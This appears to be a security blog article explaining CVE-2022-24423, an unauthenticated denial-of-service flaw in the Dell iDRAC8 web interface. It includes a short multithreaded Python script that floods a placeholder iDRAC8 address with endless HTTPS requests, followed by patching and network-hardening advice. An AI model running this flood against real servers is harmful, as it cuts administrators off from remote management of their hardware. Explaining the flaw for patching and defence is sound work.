Dell’s Integrated Dell Remote Access Controller 8 (iDRAC8) offers remote management features for Dell servers. But in early 2022, security researchers found a serious issue: a remote attacker could crash the iDRAC8 webserver with simple requests, without logging in.
In this article, I’ll break down CVE-2022-24423, show how the bug works with simple code, reference the original sources, and discuss what organizations should do about it.
What Is CVE-2022-24423?
CVE-2022-24423 is a denial of service (DoS) vulnerability in Dell iDRAC8 webserver (firmwares before 2.83.83.83). An attacker across the internet, without any authentication, can repeatedly send crafted web requests that exhaust system resources. This results in the web server (the iDRAC management interface) becoming unavailable, meaning administrators can’t use it to monitor or control their servers remotely.
How Does the Exploit Work?
The bug centers on resource exhaustion: the iDRAC8 web server does not limit or efficiently manage incoming HTTP connections or requests. An attacker can abuse this by looping HTTP requests (for example, with curl, wget, or a browser script) until the webserver can’t handle more.
After reaching its resource limits, the web interface locks up (crashes or becomes unresponsive), so legitimate admins lose access until it’s rebooted physically or by power cycling the server.
Simple Python Exploit Example
Below is an educational PoC (Proof-of-Concept) to demonstrate how the attack could work. NEVER attack systems you don’t own.
import threading
import requests
# Replace with your iDRAC8's IP address
target_host = "https://IDRAC8_IP";
def flood():
while True:
try:
requests.get(target_host, verify=False, timeout=1)
except:
pass # Ignore exceptions (could be connection reset, timeout, etc.)
threads = []
for _ in range(20): # 20 concurrent threads for impact
t = threading.Thread(target=flood)
t.start()
threads.append(t)
for t in threads:
t.join()
What this does:
Spawns 20 threads, each making endless HTTPS requests to the iDRAC8 web server. Within seconds to a few minutes, iDRAC8 will slow down, then become unresponsive to other users. The web interface will need a reset or reboot to recover.
Note: This code is a simplified version and only for testing on equipment you own or have permission to assess.
How Can Attackers Use This?
- No password required: Anyone who knows the IP address of your iDRAC8 can exploit this—especially dangerous on the public Internet.
Cheap: It doesn’t take much bandwidth or resources to trigger a denial of service.
Impact: During a DoS attack, you lose remote administration, monitoring, firmware upgrades, and troubleshooting abilities for the server until someone manually resets the iDRAC8 module.
Defensive Measures
Patch now:
Dell fixed this in iDRAC8 version 2.83.83.83. Download and upgrade your firmware.
- Dell Security Advisory DSA-2022-035
Network best practices:
Use firewalls and management VPNs for remote access.
Monitor and audit logs:
Look for bursts of failed connections to iDRAC8. Unusual traffic might indicate scanning or attempted exploitation.
References
- Dell Security Advisory DSA-2022-035
- NVD CVE-2022-24423 Details
- Dell iDRAC8 Downloads
- BleepingComputer Coverage
Conclusion
CVE-2022-24423 is a classic reminder: even management interfaces can be vulnerable to the simplest attacks. If you run Dell servers with iDRAC8, check your firmware. Always limit remote management access and keep up with security advisories. Don’t let attackers pull the plug on your management tools with just a burst of HTTP requests.
Timeline
Published on: 04/21/2022 21:15:00 UTC
Last modified on: 06/22/2022 18:15:00 UTC